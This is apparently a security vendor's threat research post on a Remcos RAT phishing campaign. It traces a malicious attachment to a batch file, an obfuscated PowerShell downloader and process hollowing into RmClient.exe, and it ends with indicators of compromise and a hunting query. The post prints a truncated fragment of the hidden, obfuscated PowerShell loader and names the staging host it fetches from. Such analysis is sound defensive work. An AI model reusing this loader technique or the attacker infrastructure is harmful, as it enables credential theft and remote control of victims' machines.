Contributors: Veena Sagar, Niranjan Jayanand, Archana Manoharan
CyberProof researchers saw a spike in the Remcos (Remote Control & Surveillance Software) campaign in September and October 2025 as it spread through emails and social engineering tricks. Remcos is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes but has been used in numerous hacking campaigns. Once installed, Remcos opens a backdoor on the device/computer, granting full access to the remote user.
CyberProof Threat Researchers were able to understand how attackers were successful in bypassing EDRs using highly obfuscated code while trying to access browser information through injecting Remcos code into RMClient – a Microsoft distributed file. The motivation of these campaigns looks to be credential theft through opportunistic targeted attacks. We suspect attackers also compromised some legitimate websites to host additional files in this operation. CyberProof will continue to monitor this campaign and will share any additional findings as updates to this article.
Technical Details
Here are the sequence of events and technical details in the most recent Remcos incident CyberProof Threat Researchers identified:
In the most recent Remcos incident we witnessed an attack where a user received an email with an attachment named ‘EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz’.
Fig. 1: Image shows user tricked to download attachment through edge browser
This archive is extracted to drop a batch file like this : C:\Users\<username>\AppData\Local\Temp\00f764ae-38a7-46c6-9b3e-5131512535c7_EFEMMAK TURKEY INQUIRY ORDER NR 09162025 (2).gz.5c7\EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat’.
Fig. 2: Shows the inner batch file
This batch file then executes an obfuscated PowerShell script as shown below utilising functions like ‘Lotusblo’ and ‘Garrots’ shown in the code snippet in later section.
Fig. 3: Launch of PowerShell script from batch file
(Hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e)
- The script initiates a hidden PowerShell process and employs a custom string de-obfuscation function and dynamic code execution using Invoke-Expression. It configures web requests to use TLS 1.2 and a custom User-Agent string. The script then constructs a target file path at C:\Users\<username>\AppData\Roaming\Hereni.Gen. It then attempts to download a file from hxxps://icebergtbilisi.ge/Sluknin.afm to this path in a continuous loop, pausing for 4 seconds between attempts, until the file is successfully downloaded. After a successful download, the script reads the content of this file, Base64 decodes it, and then attempts to decompress it using GZip. The resulting decompressed data stream object is subsequently passed to Invoke-Expression, indicating an attempt to execute the retrieved payload.
Below is a code snippet of PowerShell code that launches next stage of attack through msiexec.
powershell.exe -windowstyle hidden “spsv exergonic;function Lotusblo ($fremhvels){ $prci=3;do {$aaenaand+=$fremhvels[$prci];$prci+=4;$tradsti=Compare-Object vandfa fusela15}until (!$fremhvels[$prci])$aaenaand}function Garrots ($subflavou){.($realek) ($subflavou)}$nonex=Lotusblo ‘{{{N{{.E {{T{{{.{{{w’;$nonex+=Lotusblo ‘GGGeGG B,GGcGGGLGGGiGGGEGG n,GGt’;$easinesses=Lotusblo ‘ ;;M ;;o ;;z;;;i ; l ;l;;;a;;;/’;$emball=Lotusblo ‘P,PTPP.lPPPsPPP1PP 2′;$unhastyu=’iii[ii,NiiiE iiTiii.iiiSi,ieiiir iiV .iiiiiCiiieiiip iiOiiiiiiiniiit iim iiAiiin iiAiiigiiieiiiriii]iii:i,i:iiiS i,eiiiciiiu iiriiiiiiitii Y ip i Rii.OiiitiiiO iiCii o iiliii=iii$iiiEii miiiBiiia iiL il’;$easinesses+=Lotusblo ‘…………………………………
…………..;$modific=Lotusblo ‘S S>’;$realek=Lotusblo ‘]] I ]]e ]]x’;$home=’john’;$tineidsma=’\Hereni.Gen’;Garrots (Lotusblo ‘)
The code is responsible to launch msiexec.exe from powershell.exe as shown below
Fig. 4: PowerShell launches msiexec.exe
From device timeline, we get to see that msiexec.exe used process hollowing to inject itself into RmClient.exe.
Fig. 5: Defender showing alert on process injection of msiexec into RMClient.exe
The injected code is Remcos RAT trying to access browser saved password files, which alerted the MDR, thanks to partial EDR alerts at this stage:
Fig. 6: Alert timeline shows partial alerts when browser files were touched
The hash of RmClient ‘8f6a3b111f6e0498cb677b175966175bfa53e58c9fb41ddb63c7b7568e24c760’ seen in this incident is distributed by Microsoft
Fig. 7: Image showing RMClient hash information from VirusTotal
We checked with msiexec’s process ID to understand additional activities:
Fig. 8: Analysis on executions initiated from msiexec.exe based on process ID shows random file names dropped in Temp directory.
Additionally, we have reviewed network connections initiated from msiexec.exe ( by checking its process ID) and observed the below connections including C2 urls
Fig. 9: msiexec making remote connection
Further investigation revealed more network connections launched by msiexec.exe.
Fig 10: More network connections by msiexec
Fig. 11: Above connection by msiexec was seen failed
Below image shows the GET request to malicious C2 domain and User-Agent used when retrieving random file names.
Hunting Query
union DeviceEvents, DeviceProcessEvents
| where FileName contains “rmclient.exe”
| where ProcessCommandLine contains “AppData\\Local\\Temp”
| project Timestamp, FileName, FolderPath, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessParentFileName
Below image shows the hunting query shared, capturing related events to this Remcos events.
Fig. 11: Our hunting query captures events related to injected RMClient launched by msiexec
Configuration file
Below image shows the config file extracted by tria.ge classifying the file to be Remcos RAT.
Indicators of Compromise
- Ablelifepurelife[.]ydns.eu
- ablelifepurelifebk[.]ydns.eu
- icebergtbilisi[.]ge
- Email attachment name: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.gz
- Attachment hash: 5eb460204cd0f5510b146b8465b4392e9d0795b5d7fdb51b1c1429f97593a4b3
- Batch script file: EFEMMAK TURKEY INQUIRY ORDER NR 09162025.bat
- Script hash: 5cb34177d0289e9737e5a261b8d1aac227656b96c768f789d6fcc9bc20adb05e
- PowerShell content hash: 3ec5b13ee66d84dd75ac619ebb79c64cef7986dd6e8049f689f9ac39c272fea2
- icebergtbilisi[.]ge
- Sluknin.afm
- LAUFENDES PROJEKT 092225 NORDRHEIN WESTFALEN CHARGE MATERIALIEN�MUSTEREINREICHUNG SOWIE ANGEBOTSANFRAGE.js
- ON GOING PROJECT 091704 SUBSEQUENT BATCH MATERIALS SAMPLE SUBMITTAL AS WELL AS QUOTATION REQUEST FOR ORDER.js
- PROJECTO EM CURSO 091704 LOTE LISBOA ENVIO DE MATERIAIS� AMOSTRAS E PEDIDO DE ORCAMENTO.bat
- Attn Zapytanie ofertowe 03-270123-0612 DODATKOWE DOSTAWY MAGAZYNU ZAMOWIENIE 03-310123-0614.bat
Recommendations
- Invest in Employee Training: Employees are often the first line of defense against cyber threats. Training staff to recognize phishing emails, suspicious links, and other common attack vectors is critical. Regularly updated cybersecurity training programs ensure employees stay aware of evolving threats and adhere to best practices.
- Leverage Advanced Platforms: Modern threat detection platforms equipped with real-time monitoring, AI-driven threat intelligence, and automated response mechanisms are indispensable. These tools enable organizations to detect and neutralize threats swiftly, minimizing potential damage.
- Perform Regular Audits: Routine evaluations of your cybersecurity framework help identify and address vulnerabilities. Audits also ensure compliance with regulatory standards and improve the overall robustness of your security posture.
Conclusion
Tracking the evolution of commodity malwares and their usage in global campaigns are difficult due to their usage frequency. We highly recommend that organizations keep their security solutions updated. Specifically threat hunting teams must stay vigilant since upon successful infection, these commodity malwares steal credentials which are later used for targeted attacks that have been observed to serve ransomware in multiple instances.
CyberProof Advanced Threat Hunting service covers the gaps that EDR detection misses enabling MDR teams and Detection engineering teams to stay ahead of such evolving malware attacks.